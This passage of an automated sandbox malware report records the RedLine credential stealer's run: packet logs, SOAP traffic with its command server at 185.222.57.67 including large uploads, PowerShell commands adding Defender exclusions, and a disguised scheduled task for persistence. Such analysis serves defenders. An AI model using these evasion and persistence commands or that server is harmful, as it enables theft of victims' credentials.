Jul 16, 2024 19:57:26.922439098 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.922447920 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.922552109 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.922616005 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.922621012 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.922631025 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.922668934 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.922673941 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.922836065 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.922840118 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923155069 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923160076 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923171043 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923175097 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923177958 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923182011 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923186064 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923218012 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923223019 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923232079 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923472881 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923476934 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923480988 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923485041 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923489094 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923492908 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923502922 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923506975 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923510075 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923515081 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923525095 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923540115 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923547029 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923557997 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923562050 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923571110 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923625946 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923629999 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923634052 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923680067 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923892021 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923897028 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923911095 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923913002 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923919916 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923922062 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.923923969 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.924098969 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.924103975 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.924108028 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.924112082 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.924115896 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.924120903 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.924252033 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.924262047 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.924266100 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.924274921 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.924284935 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.924290895 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:27.740200043 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:27.754547119 CEST	49723	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:27.754971981 CEST	49722	55615	192.168.2.5	185.222.57.67

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 16, 2024 19:57:13.586420059 CEST	64713	53	192.168.2.5	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 16, 2024 19:57:13.586420059 CEST	192.168.2.5	1.1.1.1	0x7167	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 16, 2024 19:57:14.087110043 CEST	1.1.1.1	192.168.2.5	0x7167	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

185.222.57.67:55615

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49709	185.222.57.67	55615	7912	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 19:57:07.377110004 CEST	240	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 185.222.57.67:55615 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Jul 16, 2024 19:57:07.970293999 CEST	25	IN	HTTP/1.1 100 Continue
Jul 16, 2024 19:57:08.102786064 CEST	359	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 16 Jul 2024 17:57:07 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Jul 16, 2024 19:57:13.179508924 CEST	223	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 185.222.57.67:55615 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Jul 16, 2024 19:57:13.352993965 CEST	25	IN	HTTP/1.1 100 Continue
Jul 16, 2024 19:57:13.545198917 CEST	1236	IN	HTTP/1.1 200 OK Content-Length: 5711 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 16 Jul 2024 17:57:13 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED] Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>13.89.107.79</b:string><b:string>52.154.162.77</b:string><b:string>117.61.108.143</b:string><b:string>36.99.136.136</b:string><b:string>20.163.64.196</b:string><b:string>20.163.64.196</b:string><b:string>40.122.25.223</b:string><b:string>27.38.206.93</b:string><b:string>139.186.206.86</b:string><b:string>121.205.80.198</b:string><b:string>36.99.136.137</b:string><b:string>113.103.89.52</b:string><b:string>92.211.227.167</b:string><b:string>92.211.227.167</b:string><b:string>20.99.160.173</b:string><b:string>34.135.23.168</b:string><b:string>34.17.49.70</b:string><b:string>222.98.34.226</b:str [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49714	185.222.57.67	55615	6976	C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 19:57:16.014492989 CEST	240	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 185.222.57.67:55615 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Jul 16, 2024 19:57:16.616719961 CEST	25	IN	HTTP/1.1 100 Continue
Jul 16, 2024 19:57:16.749912977 CEST	359	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 16 Jul 2024 17:57:16 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Jul 16, 2024 19:57:22.146053076 CEST	223	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 185.222.57.67:55615 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Jul 16, 2024 19:57:22.319962978 CEST	25	IN	HTTP/1.1 100 Continue
Jul 16, 2024 19:57:22.510926008 CEST	1236	IN	HTTP/1.1 200 OK Content-Length: 5711 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 16 Jul 2024 17:57:22 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED] Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>13.89.107.79</b:string><b:string>52.154.162.77</b:string><b:string>117.61.108.143</b:string><b:string>36.99.136.136</b:string><b:string>20.163.64.196</b:string><b:string>20.163.64.196</b:string><b:string>40.122.25.223</b:string><b:string>27.38.206.93</b:string><b:string>139.186.206.86</b:string><b:string>121.205.80.198</b:string><b:string>36.99.136.137</b:string><b:string>113.103.89.52</b:string><b:string>92.211.227.167</b:string><b:string>92.211.227.167</b:string><b:string>20.99.160.173</b:string><b:string>34.135.23.168</b:string><b:string>34.17.49.70</b:string><b:string>222.98.34.226</b:str [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49720	185.222.57.67	55615	7912	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 19:57:17.370488882 CEST	221	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 185.222.57.67:55615 Content-Length: 557210 Expect: 100-continue Accept-Encoding: gzip, deflate
Jul 16, 2024 19:57:18.638835907 CEST	294	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 16 Jul 2024 17:57:18 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Jul 16, 2024 19:57:18.640649080 CEST	217	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 185.222.57.67:55615 Content-Length: 557202 Expect: 100-continue Accept-Encoding: gzip, deflate
Jul 16, 2024 19:57:19.192188978 CEST	408	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 16 Jul 2024 17:57:18 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49722	185.222.57.67	55615	6976	C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 19:57:25.200186968 CEST	221	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 185.222.57.67:55615 Content-Length: 556792 Expect: 100-continue Accept-Encoding: gzip, deflate
Jul 16, 2024 19:57:26.450489998 CEST	294	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 16 Jul 2024 17:57:26 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49723	185.222.57.67	55615	6976	C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 19:57:26.460031986 CEST	241	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 185.222.57.67:55615 Content-Length: 556784 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Jul 16, 2024 19:57:27.740200043 CEST	408	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 16 Jul 2024 17:57:27 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Target ID:	0
Start time:	13:56:55
Start date:	16/07/2024
Path:	C:\Users\user\Desktop\owKQ0b029a.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\owKQ0b029a.exe"
Imagebase:	0xc70000
File size:	752'105 bytes
MD5 hash:	5404B47556A2E1E9EB2F5DA481002616
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	13:56:57
Start date:	16/07/2024
Path:	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Imagebase:	0xd10000
File size:	550'920 bytes
MD5 hash:	8A9837F38BD2C2ADDA21106E3B75FFA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2154716570.0000000004116000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2154716570.0000000004116000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000007.00000002.2154716570.0000000004116000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	13:57:04
Start date:	16/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Imagebase:	0x960000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	13:57:04
Start date:	16/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	13:57:04
Start date:	16/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe"
Imagebase:	0x960000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	13:57:04
Start date:	16/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	13:57:04
Start date:	16/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp"
Imagebase:	0xf90000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	13:57:05
Start date:	16/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	13:57:05
Start date:	16/07/2024
Path:	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
Wow64 process (32bit):	false
